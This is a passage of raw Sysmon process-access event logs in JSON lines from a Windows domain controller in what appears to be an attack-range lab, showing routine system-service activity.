08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B5CA0200}","TargetProcessId":"3160","TargetImage":"C:\\Windows\\system32\\wbem\\unsecapp.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6131,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B2C10200}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B2C10200}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6132,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6133,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010B2FC0200}\r\nTargetProcessId: 3480\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010B2FC0200}","TargetProcessId":"3480","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6134,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-00105D830300}\r\nTargetProcessId: 4060\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-00105D830300}","TargetProcessId":"4060","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6135,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010E05C0400}\r\nTargetProcessId: 4108\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010E05C0400}","TargetProcessId":"4108","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6136,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nTargetProcessId: 1216\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","TargetProcessId":"1216","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6137,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.225\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.225","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6138,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.225\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.225","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6139,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.225\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1872\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2145-5F25-0000-0010EA6C0900}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.225","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1872","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2145-5F25-0000-0010EA6C0900}","TargetProcessId":"4248","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6140,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.225\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2145-5F25-0000-0010EA6C0900}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.225","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2145-5F25-0000-0010EA6C0900}","TargetProcessId":"4248","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 